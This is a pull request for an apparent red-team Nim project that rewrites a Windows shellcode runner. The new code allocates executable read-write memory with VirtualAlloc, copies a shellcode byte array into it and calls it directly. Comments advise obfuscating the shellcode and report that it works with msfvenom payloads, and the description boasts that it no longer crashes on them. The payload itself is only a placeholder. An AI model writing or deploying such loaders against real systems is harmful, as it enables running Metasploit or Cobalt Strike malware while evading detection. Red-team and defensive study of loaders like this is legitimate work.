### PR TITLE
A better way to do dynamic shellcode injection

### DIFF
--- a/src/dynamic_shellcode_local_inject_bin.nim
+++ b/src/dynamic_shellcode_local_inject_bin.nim
@@ -1,34 +1,27 @@
 #[
-    Author: Guillaume Caillé, Twitter: @OffenseTeacher
+    Author: Connor MacLeod, Twitter: @0xc130d
     License: BSD 3-Clause
 ]#
 
 import winim
 import winim/lean
 
-proc innerMain(shellcode: ptr, size: int): void =
-    let tProcess = GetCurrentProcessId()
-    var pHandle: HANDLE = OpenProcess(PROCESS_ALL_ACCESS, FALSE, tProcess)
-
-    let rPtr = VirtualAllocEx(
-        pHandle,
+proc executeLocally(shellcode: openArray[byte]): void =
+    let pShellcodeDest = VirtualAlloc(
         NULL,
-        cast[SIZE_T](size),
+        shellcode.len,
         MEM_COMMIT,
         PAGE_EXECUTE_READ_WRITE
     )
 
-    copyMem(rPtr, shellcode, size)
-    let f = cast[proc(){.nimcall.}](rPtr)
+    copyMem(pShellcodeDest, shellcode[0].addr, shellcode.len)
+    let f = cast[proc(){.nimcall.}](pShellcodeDest)
     f()
 
 when defined(windows):
     when isMainModule:
-        const sc_length: int = 941 #Set the final shellcode length. Is necessary to cast the shellcode as a pointer later
+        #Do what you want to obfuscate your shellcode as long as you end with a decoded/decrypted seq[byte] or array[byte]
+        #Works with every msfvenom payload I've tried
+        var shellcode: seq[byte] = @[byte 0xc, 0x13, 0x0d] #Replace with your own shellcode
 
-        #Do what you want to obfuscate your shellcode as long as you end with a decoded/decrypted seq[byte] with a length of the sc_length variable
-        #Seems to crash with metasploit's messagebox but works fine with CobaltStrike
-        var shellcode: seq[byte] = @[byte 0xfc, 0x48] #Replace with your own shellcode
-
-        var shellcodePtr = (cast[ptr array[sc_length, byte]](addr shellcode[0]))
-        innerMain(shellcodePtr, len(shellcode))
+        shellcode.executeLocally()

--- a/src/dynamic_shellcode_local_inject_bin.nim
+++ b/src/dynamic_shellcode_local_inject_bin.nim
@@ -3,7 +3,6 @@
     License: BSD 3-Clause
 ]#
 
-import winim
 import winim/lean
 
 proc executeLocally(shellcode: openArray[byte]): void =


### PR DESCRIPTION
This method offers a few advantages over the previous method:

- Allows use of a Seq, therefore the size of the array doesn't need to be known at compile time
- Doesn't crash on MSFVenom payloads
- Uses `VirtualAlloc` instead of `VirtualAllocEx`
- Uses more idiomatic Nim conventions

Please let me know if everything here looks all right, happy to make changes if needed.